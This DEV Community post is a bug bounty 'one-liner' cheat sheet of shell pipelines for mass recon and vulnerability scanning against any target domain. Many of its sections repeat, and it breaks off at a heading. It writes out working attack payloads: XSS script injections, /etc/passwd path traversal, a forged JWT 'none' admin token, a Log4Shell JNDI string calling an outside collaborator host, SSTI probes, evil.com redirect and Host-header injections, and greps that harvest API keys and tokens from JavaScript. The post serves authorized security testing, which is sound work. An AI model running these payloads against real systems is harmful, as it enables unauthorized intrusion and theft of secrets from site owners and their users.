DEV Community

Cover image for One-Liner Bug Bounty CheatSheet
YogSec
YogSec

Posted on

One-Liner Bug Bounty CheatSheet

One-Liner Bug Bounty CheatSheet

Why One-Liners?

In the world of bug bounty hunting, time is precious. Short, impactful tips can make all the difference. Here, you'll find quick insights that can easily be referenced when you're diving into a new target, testing a feature, or looking to refine your methodology.

Buy me a coffee ☕ → https://buymeacoffee.com/yogsec

Github - https://github.com/yogsec/OneLinerBounty

Misconfigurations, Tech Detection, and Common Bugs

If you want wider coverage, like misconfigurations, tech detection, and common bugs, change the template path to -t vulnerabilities/:

cat urls.txt | httpx -silent -mc 200 | nuclei -silent -t vulnerabilities/ -o results.txt
Enter fullscreen mode Exit fullscreen mode

Subdomain Takeovers - Quick Check

Want to check for subdomain takeovers in one line?

subfinder -d example.com | httpx -silent | nuclei -silent -t takeovers/ -o takeover.txt
Enter fullscreen mode Exit fullscreen mode

Subdomain Discovery + Live Check

For subdomain discovery with live check:

subfinder -d target.com | httpx -silent -mc 200
Enter fullscreen mode Exit fullscreen mode

Subdomain Takeover Detection

Detect subdomain takeovers:

subfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/
Enter fullscreen mode Exit fullscreen mode

Directory Bruteforce (Content Discovery)

For directory bruteforce:

ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200
Enter fullscreen mode Exit fullscreen mode

Find Open Redirects (Quick Scan)

To quickly find open redirects:

cat urls.txt | gf redirect | httpx -silent
Enter fullscreen mode Exit fullscreen mode

XSS Detection (Using Dalfox)

For XSS detection using Dalfox:

cat urls.txt | dalfox pipe --skip-bav --only-poc
Enter fullscreen mode Exit fullscreen mode

SQL Injection Discovery

For SQL Injection discovery:

cat urls.txt | gf sqli | sqlmap --batch --random-agent -m -
Enter fullscreen mode Exit fullscreen mode

Subdomain Takeovers - Quick Check

Want to check for subdomain takeovers in one line?

subfinder -d example.com | httpx -silent | nuclei -silent -t takeovers/ -o takeover.txt
Enter fullscreen mode Exit fullscreen mode

Subdomain Discovery + Live Check

For subdomain discovery with live check:

subfinder -d target.com | httpx -silent -mc 200
Enter fullscreen mode Exit fullscreen mode

Subdomain Takeover Detection

Detect subdomain takeovers:

subfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/
Enter fullscreen mode Exit fullscreen mode

Directory Bruteforce (Content Discovery)

For directory bruteforce:

ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200
Enter fullscreen mode Exit fullscreen mode

Find Open Redirects (Quick Scan)

To quickly find open redirects:

cat urls.txt | gf redirect | httpx -silent
Enter fullscreen mode Exit fullscreen mode

XSS Detection (Using Dalfox)

For XSS detection using Dalfox:

cat urls.txt | dalfox pipe --skip-bav --only-poc
Enter fullscreen mode Exit fullscreen mode

SQL Injection Discovery

For SQL Injection discovery:

cat urls.txt | gf sqli | sqlmap --batch --random-agent -m -
Enter fullscreen mode Exit fullscreen mode

Find Sensitive Files (Backup, Config, etc.)

To find sensitive files like backups and configuration files:

cat urls.txt | waybackurls | grep -Ei '\.(bak|old|backup|log|env|sql|config)$'
Enter fullscreen mode Exit fullscreen mode

CORS Misconfiguration Detection

To detect CORS misconfigurations:

cat urls.txt | corscanner
Enter fullscreen mode Exit fullscreen mode

Detect Technologies + Possible CVEs

To detect technologies and possible CVEs:

cat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/
Enter fullscreen mode Exit fullscreen mode

Parameter Discovery (for further testing)

To discover parameters for further testing:

cat urls.txt | waybackurls | uro | grep '?'
Enter fullscreen mode Exit fullscreen mode

Full Recon Chain (Subdomains + Live Check + Technologies + Titles)

For full recon chain:

subfinder -d target.com | httpx -silent -title -tech-detect
Enter fullscreen mode Exit fullscreen mode

Subdomain Enum + Ports Scan (Fast)

For a fast subdomain enumeration and port scan:

subfinder -d target.com | naabu -silent -top-ports 1000
Enter fullscreen mode Exit fullscreen mode

All URLs from Wayback, CommonCrawl, and AlienVault

To get all URLs from Wayback, CommonCrawl, and AlienVault:

gau target.com | tee urls.txt
Enter fullscreen mode Exit fullscreen mode

Find Secrets in JS Files

To find secrets in JS files:

cat urls.txt | grep '\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | tr "[:space:]" "\n" | grep -Ei "(api|key|token|secret|password|passwd|authorization)="'
Enter fullscreen mode Exit fullscreen mode

Find Open AWS Buckets

To find open AWS buckets:

subfinder -d target.com | httpx -silent | nuclei -silent -t s3-detect.yaml
Enter fullscreen mode Exit fullscreen mode

Find Misconfigured Login Panels

To find misconfigured login panels:

cat urls.txt | nuclei -silent -t exposed-panels/
Enter fullscreen mode Exit fullscreen mode

Check All Parameters for Reflected XSS

To check all parameters for reflected XSS:

cat urls.txt | gf xss | dalfox pipe --skip-bav --only-poc
Enter fullscreen mode Exit fullscreen mode

Check for Exposed Git Repositories

To check for exposed Git repositories:

cat urls.txt | httpx -silent -path "/.git/config" -mc 200
Enter fullscreen mode Exit fullscreen mode

Extract All Parameters from URLs (for manual testing)

To extract all parameters from URLs for manual testing:

cat urls.txt | uro | grep '?'
Enter fullscreen mode Exit fullscreen mode

Takeover Domains from Subdomain List

To perform takeover checks on domains from a subdomain list:

cat subdomains.txt | nuclei -silent -t takeovers/
Enter fullscreen mode Exit fullscreen mode

Find CVEs Based on Technology

To find CVEs based on technology:

cat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/
Enter fullscreen mode Exit fullscreen mode

Find Top Ports + Services for All Subdomains (Recon + Port Scan)

To find the top ports and services for all subdomains:

subfinder -d target.com | naabu -top-ports 1000 -silent
Enter fullscreen mode Exit fullscreen mode

Extract All Endpoints from JS Files (JS Analysis)

To extract all endpoints from JS files for analysis:

cat urls.txt | grep '\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | grep -oE "(/api/v[0-9]+/[^\"'\'']+|/[a-zA-Z0-9_/.-]+\.(php|aspx|jsp|html|json|xml|txt))"'
Enter fullscreen mode Exit fullscreen mode

Subdomain Discovery + Live Check

For subdomain discovery with live check:

subfinder -d target.com | httpx -silent -mc 200
Enter fullscreen mode Exit fullscreen mode

Subdomain Takeover Detection

Detect subdomain takeovers:

subfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/
Enter fullscreen mode Exit fullscreen mode

Directory Bruteforce (Content Discovery)

For directory bruteforce:

ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200
Enter fullscreen mode Exit fullscreen mode

Find Open Redirects (Quick Scan)

To quickly find open redirects:

cat urls.txt | gf redirect | httpx -silent
Enter fullscreen mode Exit fullscreen mode

XSS Detection (Using Dalfox)

For XSS detection using Dalfox:

cat urls.txt | dalfox pipe --skip-bav --only-poc
Enter fullscreen mode Exit fullscreen mode

SQL Injection Discovery

For SQL Injection discovery:

cat urls.txt | gf sqli | sqlmap --batch --random-agent -m -
Enter fullscreen mode Exit fullscreen mode

Find Sensitive Files (Backup, Config, etc.)

To find sensitive files like backups and configuration files:

cat urls.txt | waybackurls | grep -Ei '\.(bak|old|backup|log|env|sql|config)$'
Enter fullscreen mode Exit fullscreen mode

CORS Misconfiguration Detection

To detect CORS misconfigurations:

cat urls.txt | corscanner
Enter fullscreen mode Exit fullscreen mode

Detect Technologies + Possible CVEs

To detect technologies and possible CVEs:

cat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/
Enter fullscreen mode Exit fullscreen mode

Parameter Discovery (for further testing)

To discover parameters for further testing:

cat urls.txt | waybackurls | uro | grep '?'
Enter fullscreen mode Exit fullscreen mode

Full Recon Chain (Subdomains + Live Check + Technologies + Titles)

For full recon chain:

subfinder -d target.com | httpx -silent -title -tech-detect
Enter fullscreen mode Exit fullscreen mode

Subdomain Enum + Ports Scan (Fast)

For a fast subdomain enumeration and port scan:

subfinder -d target.com | naabu -silent -top-ports 1000
Enter fullscreen mode Exit fullscreen mode

All URLs from Wayback, CommonCrawl, and AlienVault

To get all URLs from Wayback, CommonCrawl, and AlienVault:

gau target.com | tee urls.txt
Enter fullscreen mode Exit fullscreen mode

Find Secrets in JS Files

To find secrets in JS files:

cat urls.txt | grep '\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | tr "[:space:]" "\n" | grep -Ei "(api|key|token|secret|password|passwd|authorization)="'
Enter fullscreen mode Exit fullscreen mode

Find Open AWS Buckets

To find open AWS buckets:

subfinder -d target.com | httpx -silent | nuclei -silent -t s3-detect.yaml
Enter fullscreen mode Exit fullscreen mode

Find Misconfigured Login Panels

To find misconfigured login panels:

cat urls.txt | nuclei -silent -t exposed-panels/
Enter fullscreen mode Exit fullscreen mode

Check All Parameters for Reflected XSS

To check all parameters for reflected XSS:

cat urls.txt | gf xss | dalfox pipe --skip-bav --only-poc
Enter fullscreen mode Exit fullscreen mode

Check for Exposed Git Repositories

To check for exposed Git repositories:

cat urls.txt | httpx -silent -path "/.git/config" -mc 200
Enter fullscreen mode Exit fullscreen mode

Extract All Parameters from URLs (for manual testing)

To extract all parameters from URLs for manual testing:

cat urls.txt | uro | grep '?'
Enter fullscreen mode Exit fullscreen mode

Takeover Domains from Subdomain List

To perform takeover checks on domains from a subdomain list:

cat subdomains.txt | nuclei -silent -t takeovers/
Enter fullscreen mode Exit fullscreen mode

Find CVEs Based on Technology

To find CVEs based on technology:

cat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/
Enter fullscreen mode Exit fullscreen mode

Find Top Ports + Services for All Subdomains (Recon + Port Scan)

To find the top ports and services for all subdomains:

subfinder -d target.com | naabu -top-ports 1000 -silent
Enter fullscreen mode Exit fullscreen mode

Extract All Endpoints from JS Files (JS Analysis)

To extract all endpoints from JS files for analysis:

cat urls.txt | grep '\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | grep -oE "(/api/v[0-9]+/[^\"'\'']+|/[a-zA-Z0-9_/.-]+\.(php|aspx|jsp|html|json|xml|txt))"'
Enter fullscreen mode Exit fullscreen mode

Scan for Backup Files (Old Config/DB Dumps)

To scan for backup files, old config, or DB dumps:

cat urls.txt | httpx -silent -path-list <(echo -e "/.env\n/config.php\n/backup.zip\n/database.sql\n/admin.bak") -mc 200
Enter fullscreen mode Exit fullscreen mode

Find Open .git Folders (Source Leak)

To find open .git folders:

cat subdomains.txt | httpx -silent -path "/.git/config" -mc 200
Enter fullscreen mode Exit fullscreen mode

WordPress Scan (Detect Plugins, Themes, etc.)

For WordPress scan to detect plugins, themes, etc.:

cat urls.txt | nuclei -silent -t technologies/wordpress/
Enter fullscreen mode Exit fullscreen mode

Hunt for CRLF Injection (Newline Injection)

To hunt for CRLF injection:

cat urls.txt | gf crlf | qsreplace '%0d%0aTestHeader:TestValue' | httpx -silent -hdrs
Enter fullscreen mode Exit fullscreen mode

Detect CORS Misconfigurations (Very Common Bug)

To detect CORS misconfigurations:

cat urls.txt | corscanner
Enter fullscreen mode Exit fullscreen mode

Test All URLs for LFI (Local File Inclusion)

To test all URLs for LFI:

cat urls.txt | gf lfi | qsreplace '/etc/passwd' | httpx -silent -mc 200
Enter fullscreen mode Exit fullscreen mode

Find Information Disclosure via Backup Files

To find information disclosure via backup files:

cat urls.txt | waybackurls | grep -Ei '\.(bak|old|backup|log|sql|env|zip|tar|gz|rar)$' | httpx -silent -mc 200
Enter fullscreen mode Exit fullscreen mode

Find Exposed Panels (Admin, Login, etc.)

To find exposed admin/login panels:

cat urls.txt | nuclei -silent -t exposed-panels/
Enter fullscreen mode Exit fullscreen mode

Full JS Hunting + Secrets Scan (for frontend leaks)

For full JS hunting and secrets scan:

gau target.com | grep '\.js$' | httpx -silent | xargs -I{} bash -c 'echo {} && curl -s {} | tr -d "\r" | grep -E -i "(api[_-]?key|secret|token|auth|password|passwd|client[_-]?id|client[_-]?secret)="'
Enter fullscreen mode Exit fullscreen mode

Search for Open Redirects (URL Redirect issues)

To search for open redirects:

cat urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -mc 302,301 -fr 'evil.com'
Enter fullscreen mode Exit fullscreen mode

Quick Scan for SQL Injection

For a quick SQL injection scan:

cat urls.txt | gf sqli | sqlmap --batch --random-agent -m -
Enter fullscreen mode Exit fullscreen mode

Find Interesting Endpoints (Like admin, login, debug, etc.)

To find interesting endpoints like admin, login, debug, etc.:

gau target.com | grep -Ei '/(admin|login|debug|test|backup|panel|dashboard)'
Enter fullscreen mode Exit fullscreen mode

Check for Exposed Config Files (like .env, .git, .DS_Store)

To check for exposed config files:

cat urls.txt | httpx -silent -path-list <(echo -e '/.env\n/.git/config\n/.DS_Store\n/config.php\n/config.json') -mc 200
Enter fullscreen mode Exit fullscreen mode

Scan for CVE in All Subdomains

To scan for CVEs in all subdomains:

subfinder -d target.com | httpx -silent | nuclei -silent -t cves/
Enter fullscreen mode Exit fullscreen mode

Full Backup File Search (All extensions that leak data)

To search for all extensions that leak backup files:

gau target.com | grep -Ei '\.(bak|old|backup|sql|log|tar|zip|gz|rar|swp|env|config)$' | httpx -silent -mc 200
Enter fullscreen mode Exit fullscreen mode

Check for CORS Misconfigurations

To check for CORS misconfigurations:

cat urls.txt | corscanner
Enter fullscreen mode Exit fullscreen mode

Scan for Open Admin Panels (Exposed Panels)

cat urls.txt | nuclei -silent -t exposed-panels/
Enter fullscreen mode Exit fullscreen mode

ALL-IN-ONE MEGA SCAN 💣 (Subdomain + Alive + CVE Scan + Panels)

subfinder -d target.com | httpx -silent -mc 200 | tee alive.txt | nuclei -silent -t cves/,exposed-panels/
Enter fullscreen mode Exit fullscreen mode

All-in-One Recon Pipeline (Subdomains → Probing → Ports → Tech Detection → Titles)

subfinder -d target.com | anew subs.txt && cat subs.txt | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | anew alive.txt
Enter fullscreen mode Exit fullscreen mode

Mass Fetch JS Files + Find Secrets + Endpoints + Tokens

cat alive.txt | hakrawler -subs | grep '\.js$' | anew jsfiles.txt && cat jsfiles.txt | xargs -I{} bash -c 'curl -s {} | tr -d "\r" | egrep -i "(api|key|token|secret|password|passwd|authorization|bearer|client_id|client_secret)"' | tee secrets.txt
Enter fullscreen mode Exit fullscreen mode

Check for Open Redirects Across All Params (with Payload Injection)

cat alive.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -mc 302,301
Enter fullscreen mode Exit fullscreen mode

Automatic Vulnerability Scan (Subdomains to CVE Detection + Misconfigs)

subfinder -d target.com | httpx -silent | nuclei -silent -t cves/,misconfiguration/
Enter fullscreen mode Exit fullscreen mode

Backup Files Bruteforce Across All Hosts

cat alive.txt | httpx -silent -path-list <(echo -e "/.git/config\n/.env\n/database.sql\n/backup.zip\n/config.php\n/wp-config.php") -mc 200 | tee backups.txt
Enter fullscreen mode Exit fullscreen mode

Check for Parameter-Based XSS (Direct Injection Testing)

cat alive.txt | hakrawler -subs -depth 2 | gf xss | qsreplace '"><script>alert(document.domain)</script>' | httpx -silent -fr 'alert(document.domain)'
Enter fullscreen mode Exit fullscreen mode

Automated LFI Discovery (Common Payloads)

cat alive.txt | gf lfi | qsreplace '../../../../../../etc/passwd' | httpx -silent -mc 200
Enter fullscreen mode Exit fullscreen mode

Fuzz Parameters & Check Reflections (for XSS & Injection Discovery)

cat alive.txt | waybackurls | gf params | uro | qsreplace FUZZ | ffuf -u FUZZ -w wordlists/payloads/xss.txt -fr 'FUZZ'
Enter fullscreen mode Exit fullscreen mode

Subdomain Takeover Detection (Live Scan + Detection)

subfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/
Enter fullscreen mode Exit fullscreen mode

Full Asset Discovery + Technology Analysis + Title Collection

assetfinder --subs-only target.com | httpx -silent -title -tech-detect | tee assets_with_tech.txt
Enter fullscreen mode Exit fullscreen mode

Mega Pipeline - Subdomains → URLs → Parameters → XSS/SQL/Secrets

subfinder -d target.com | anew subs.txt && cat subs.txt | httpx -silent | hakrawler -subs -depth 2 | anew urls.txt && cat urls.txt | gf xss | dalfox pipe --skip-bav --only-poc | tee xss_poc.txt && cat urls.txt | grep '\.js$' | xargs -I{} bash -c 'curl -s {} | egrep -i "(api|key|token|secret|password|passwd|auth)"' | tee secrets.txt
Enter fullscreen mode Exit fullscreen mode

Ultimate Recon Monster (Subdomains → Probing → Ports → Technologies → CVEs)

subfinder -d target.com | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | tee tech_scan.txt && cat tech_scan.txt | nuclei -silent -t cves/
Enter fullscreen mode Exit fullscreen mode

Automated Asset Hunting + JS Analysis + Secret Finder

subfinder -d target.com | httpx -silent -mc 200 | hakrawler -subs -depth 3 -plain | anew urls.txt && cat urls.txt | grep '\.js$' | xargs -I{} bash -c 'curl -s {} | tr -d "\r" | gf secrets | tee -a secrets.txt'
Enter fullscreen mode Exit fullscreen mode

Mass Fuzz Every Parameter with XSS, LFI, SQLi Payloads (Ultimate Param Attacker)

cat urls.txt | gf xss,lfi,sqli | uro | qsreplace FUZZ | ffuf -u FUZZ -w xss.txt,lfi.txt,sqli.txt -fr "FUZZ" | tee param_fuzz.txt
Enter fullscreen mode Exit fullscreen mode

Subdomain Takeover, DNS Hijack, Misconfig Scan - All In One

subfinder -d target.com | dnsx -a -resp-only -silent | nuclei -silent -t takeovers/,dns/
Enter fullscreen mode Exit fullscreen mode

Automatic Full Backup File Bruteforcing Across All Hosts (Super Leaks Finder)

subfinder -d target.com | httpx -silent | anew alive.txt && cat alive.txt | httpx -silent -path-list <(curl -s https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/backup.txt) -mc 200 | tee backups_found.txt
Enter fullscreen mode Exit fullscreen mode

Deep Directory Brute Force (Smart Recursive Finder)

subfinder -d target.com | httpx -silent | anew alive.txt && cat alive.txt | xargs -I{} gobuster dir -u {} -w big_wordlist.txt -t 50 -o gobuster_output.txt
Enter fullscreen mode Exit fullscreen mode

Blind SSRF Auto-Detection in All Parameters

cat urls.txt | gf ssrf | qsreplace 'http://canarytoken.com' | httpx -silent -mc 200 -fr 'canarytoken'
Enter fullscreen mode Exit fullscreen mode

Mega Wordlist Generator from Wayback + JS + HTML Comments + Robots.txt + Sitemap.xml

subfinder -d target.com | httpx -silent | anew alive.txt && cat alive.txt | hakrawler -subs -depth 2 | anew urls.txt && cat urls.txt | gf wordlist | anew wordlist.txt
Enter fullscreen mode Exit fullscreen mode

Full Sitemap & Robots Extraction Across Subdomains

subfinder -d target.com | httpx -silent -path-list <(echo -e "/robots.txt\n/sitemap.xml") -mc 200 | tee robots_sitemaps.txt
Enter fullscreen mode Exit fullscreen mode

CRLF Injection Full Auto Discovery & Exploit

cat urls.txt | gf crlf | qsreplace '%0d%0aTest-Header: InjectedValue' | httpx -silent -hdrs | tee crlf_vulns.txt
Enter fullscreen mode Exit fullscreen mode

CSP Analyzer Across All Hosts (Misconfig Finder)

cat alive.txt | httpx -silent -path / -mc 200 -hdrs | grep -i 'content-security-policy' | tee csp_misconfig.txt
Enter fullscreen mode Exit fullscreen mode

Full JS Endpoint Extraction + Sensitive Function Search (eval, document.write, etc.)

cat urls.txt | grep '\.js$' | xargs -I{} bash -c 'curl -s {} | grep -E -o "(http|https)://[^\" ]+" | anew js_endpoints.txt && curl -s {} | egrep -i "(document\.write|eval|innerHTML|fetch|XMLHttpRequest|localStorage|sessionStorage|cookie)" | tee -a sensitive_js.txt'
Enter fullscreen mode Exit fullscreen mode

Recon + Full Vuln Scan + CORS, Headers, CVE, Misconfig, Secrets — One Command to Rule Them All

subfinder -d target.com | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | tee alive.txt && cat alive.txt | nuclei -silent -t cves/,misconfiguration/,exposures/,default-logins/,panels/ | tee findings.txt && cat alive.txt | hakrawler -subs -depth 3 | anew urls.txt && cat urls.txt | gf xss,sqli,lfi,ssrf | dalfox pipe --skip-bav --only-poc | tee vulns.txt && cat urls.txt | grep '\.js$' | xargs -I{} bash -c 'curl -s {} | tr -d "\r" | gf secrets' | tee secrets_found.txt
Enter fullscreen mode Exit fullscreen mode

Subdomain Takeover + Open Redirect Chain (Full Passive → Exploit Ready)

subfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/,redirect/ -o takeover_redirects.txt
Enter fullscreen mode Exit fullscreen mode

Full Parameter Discovery + Automated Fuzzing (XSS, SQLi, LFI, SSRF)

gau target.com | gf xss,lfi,sqli,ssrf | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/lfi.txt,payloads/sqli.txt,payloads/ssrf.txt -fr "FUZZ" | tee param_vulns.txt
Enter fullscreen mode Exit fullscreen mode

Auto Search for Backup Files + Leaked Configs (All Subdomains)

subfinder -d target.com | httpx -silent -path-list <(curl -s https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/backup.txt) -mc 200 | tee backup_leaks.txt
Enter fullscreen mode Exit fullscreen mode

Deep Web Archive Scraping + JS Secrets Extraction

gau --subs target.com | grep '\.js$' | httpx -silent -status-code -mc 200 | xargs -I{} bash -c 'curl -s {} | gf secrets' | tee js_secrets.txt
Enter fullscreen mode Exit fullscreen mode

Auto-Dump All Endpoints from Wayback, JS, Robots.txt, Sitemap.xml

subfinder -d target.com | anew subs.txt && cat subs.txt | httpx -silent -path-list <(echo -e "/robots.txt\n/sitemap.xml") -mc 200 | hakrawler -subs -depth 3 | anew all_urls.txt
Enter fullscreen mode Exit fullscreen mode

CSP Bypass Finder (Auto Fetch CSP Across All Subdomains)

subfinder -d target.com | httpx -silent -path / -mc 200 -hdrs | grep -i 'content-security-policy' | tee csp_policies.txt
Enter fullscreen mode Exit fullscreen mode

Automatic SSRF Detection (Using Collaborator/Canarytokens)

gau target.com | gf ssrf | qsreplace 'http://your-collaborator-url.burpcollaborator.net' | httpx -silent
Enter fullscreen mode Exit fullscreen mode

Deep Search for Hidden Panels + Config Pages (Across All Ports)

subfinder -d target.com | httpx -silent -ports 80,443,8080,8443 | nuclei -silent -t panels/,exposures/configs/ -o exposed_panels.txt
Enter fullscreen mode Exit fullscreen mode

Entire Subdomain + Tech Stack + CVE + Misconfig Scan (Full Recon Bomb)

subfinder -d target.com | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | nuclei -silent -t cves/,misconfiguration/ -o full_scan.txt
Enter fullscreen mode Exit fullscreen mode

Auto-Scrape HTML Comments for Sensitive Info

cat all_urls.txt | httpx -silent -mc 200 -fr 'text/html' -body | grep -iE "<!--.*-->" | tee html_comments.txt
Enter fullscreen mode Exit fullscreen mode

URL Extraction from JS Files (Full Recursive)

cat all_urls.txt | grep '\.js$' | xargs -I{} bash -c 'curl -s {} | grep -Eo "(https?|ftp)://[a-zA-Z0-9./?=_-]*"' | anew extracted_urls.txt
Enter fullscreen mode Exit fullscreen mode

Super Bruteforce for Backup + Git + Env + SQL Dumps

subfinder -d target.com | httpx -silent -path-list <(echo -e "/.git/\n/.env\n/database.sql\n/backup.zip\n/config.yml") -mc 200 | tee sensitive_files.txt
Enter fullscreen mode Exit fullscreen mode

Advanced Open Redirect Scanner Across All Params

cat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt
Enter fullscreen mode Exit fullscreen mode

Full Headers Security Misconfig Audit

subfinder -d target.com | httpx -silent -path / -mc 200 -hdrs | nuclei -silent -t misconfiguration/http-headers/ -o header_issues.txt
Enter fullscreen mode Exit fullscreen mode

Auto-Gather All IPs, ASN, WHOIS for Every Subdomain

subfinder -d target.com | dnsx -a -resp-only | anew all_ips.txt && cat all_ips.txt | xargs -I{} sh -c 'whois {} | grep -iE "OrgName|NetName|CIDR"' | tee whois_lookup.txt
Enter fullscreen mode Exit fullscreen mode

Master Recon + Scan Pipeline (One-Liner)

subfinder -d target.com | tee subs.txt && cat subs.txt | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | tee tech_info.txt && cat subs.txt | hakrawler -subs -depth 3 | anew urls.txt && cat urls.txt | nuclei -silent -t cves/,misconfiguration/,takeovers/,panels/,redirect/ -o nuclei_findings.txt && cat urls.txt | gf xss,sqli,lfi,ssrf,redirect | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/sqli.txt,payloads/lfi.txt,payloads/ssrf.txt -fr "FUZZ" | tee param_scan.txt
Enter fullscreen mode Exit fullscreen mode

Additional Specific Recon + Vulnerability Scanning Commands

Directory Traversal (Across All Endpoints)

cat all_urls.txt | gf lfi | qsreplace '../../../../../etc/passwd' | httpx -silent -fr 'root:x' -o traversal_hits.txt
Enter fullscreen mode Exit fullscreen mode

Exposed Git Repos Finder (Automated)

subfinder -d target.com | httpx -silent -path /.git/HEAD -mc 200 -o exposed_git.txt
Enter fullscreen mode Exit fullscreen mode

IDOR Discovery (Bruteforce Parameter Tampering)

cat all_urls.txt | gf idor | qsreplace 'id=123' | anew idor_urls.txt && qsreplace 'id=124' | httpx -silent -mc 200 -o possible_idor.txt
Enter fullscreen mode Exit fullscreen mode

JWT Token Misconfig (None Algorithm)

cat all_urls.txt | grep -Ei 'jwt|token' | qsreplace 'eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' | httpx -silent -mc 200 -o jwt_none.txt
Enter fullscreen mode Exit fullscreen mode

Unrestricted File Upload (Testing Common Upload Points)

cat all_urls.txt | gf upload | qsreplace 'file=payload.php' | httpx -silent -upload-file payload.php -o upload_findings.txt
Enter fullscreen mode Exit fullscreen mode

Path Confusion + Overlays (Detect Double Extensions)

cat all_urls.txt | sed 's/$/%00index.php/' | httpx -silent -mc 200 -o path_confusion.txt
Enter fullscreen mode Exit fullscreen mode

CORS Wildcard + Credentials Misconfig

subfinder -d target.com | httpx -silent -path / -H 'Origin: https://evil.com' -hdrs | grep -i 'access-control-allow-origin' | grep 'evil.com' | tee weak_cors.txt
Enter fullscreen mode Exit fullscreen mode

Log4Shell Finder (Old but Gold)

cat all_urls.txt | gf ssrf | qsreplace '${jndi:ldap://your-collaborator-url.burpcollaborator.net}' | httpx -silent
Enter fullscreen mode Exit fullscreen mode

Server Side Template Injection (SSTI Detection)

cat all_urls.txt | gf ssti | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti_hits.txt
Enter fullscreen mode Exit fullscreen mode

Prototype Pollution Detection (Direct & Indirect)

cat all_urls.txt | gf parameters | qsreplace '__proto__[exploit]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt
Enter fullscreen mode Exit fullscreen mode

Exposed Debug Pages (Stack Traces, Debug Consoles)

subfinder -d target.com | httpx -silent -path-list <(echo -e '/debug\n/_profiler\n/_debugbar\n/_error') -mc 200 -o debug_pages.txt
Enter fullscreen mode Exit fullscreen mode

Email Leaks in JS Files

cat all_urls.txt | grep '\.js$' | xargs -I{} curl -s {} | grep -Eo "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | tee emails_found.txt
Enter fullscreen mode Exit fullscreen mode

Cloud Misconfig - Public S3 Buckets

subfinder -d target.com | httpx -silent -path / -hdrs | grep -i 'x-amz-bucket-region' | tee public_s3.txt
Enter fullscreen mode Exit fullscreen mode

Exposed Admin Panels (Full Auto Discovery)

subfinder -d target.com | httpx -silent -path-list <(curl -s https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/admin-panels.txt) -mc 200 -o exposed_admins.txt
Enter fullscreen mode Exit fullscreen mode

Mass Content Injection Check (Reflected Params)

cat all_urls.txt | gf xss | qsreplace '<script>alert(1)</script>' | httpx -silent -fr '<script>alert(1)</script>' -o reflected_xss.txt
Enter fullscreen mode Exit fullscreen mode

BONUS — Ultimate ALL Misconfig Scanner (Headers, Panels, Debug, Leaks)

subfinder -d target.com | httpx -silent -title -tech-detect | nuclei -silent -t misconfiguration/ -o misconfigs_found.txt
Enter fullscreen mode Exit fullscreen mode

API Key Leaks in JS Files

cat all_js_urls.txt | xargs -I{} curl -s {} | grep -Eo 'AIza[0-9A-Za-z_-]{35}|sk_live_[0-9a-zA-Z]{24}' | tee leaked_api_keys.txt
Enter fullscreen mode Exit fullscreen mode

Backup Files Discovery (Think: .bak, .old, .swp)

cat all_urls.txt | sed -E 's/(.*)/\1~\n\1.bak\n\1.old\n\1.swp/' | httpx -silent -mc 200 -o backup_files.txt
Enter fullscreen mode Exit fullscreen mode

PHP Unit RCE Finder (Real-World Gold)

subfinder -d target.com | httpx -silent -path /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php -mc 200 -o phpunit_rce.txt
Enter fullscreen mode Exit fullscreen mode

GraphQL Misconfig Detection (Introspection Enabled)

cat all_urls.txt | grep 'graphql' | xargs -I{} curl -s -X POST -d '{"query":"{__schema{types{name}}}"}' {} | grep -iq 'types' && echo "{} introspection enabled" >> graphql_misconfigs.txt
Enter fullscreen mode Exit fullscreen mode

Host Header Injection

cat all_urls.txt | httpx -silent -H 'Host: evil.com' -hdrs | grep -i 'evil.com' | tee host_header_injection.txt
Enter fullscreen mode Exit fullscreen mode

Open Redirect Finder (Redirection Abuse)

cat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'https://evil.com' -o open_redirects.txt
Enter fullscreen mode Exit fullscreen mode

Session Fixation Detection

cat all_urls.txt | gf login | qsreplace 'sessionid=1234abcd' | httpx -silent -fr '1234abcd' -o session_fixation.txt
Enter fullscreen mode Exit fullscreen mode

Exposed .env Files (Sensitive Config Exposure)

subfinder -d target.com | httpx -silent -path /.env -mc 200 -o exposed_env.txt
Enter fullscreen mode Exit fullscreen mode

SSRF Detection (Collaboration Automation)

cat all_urls.txt | gf ssrf | qsreplace 'http://your-collab-url.burpcollaborator.net' | httpx -silent
Enter fullscreen mode Exit fullscreen mode

CRLF Injection

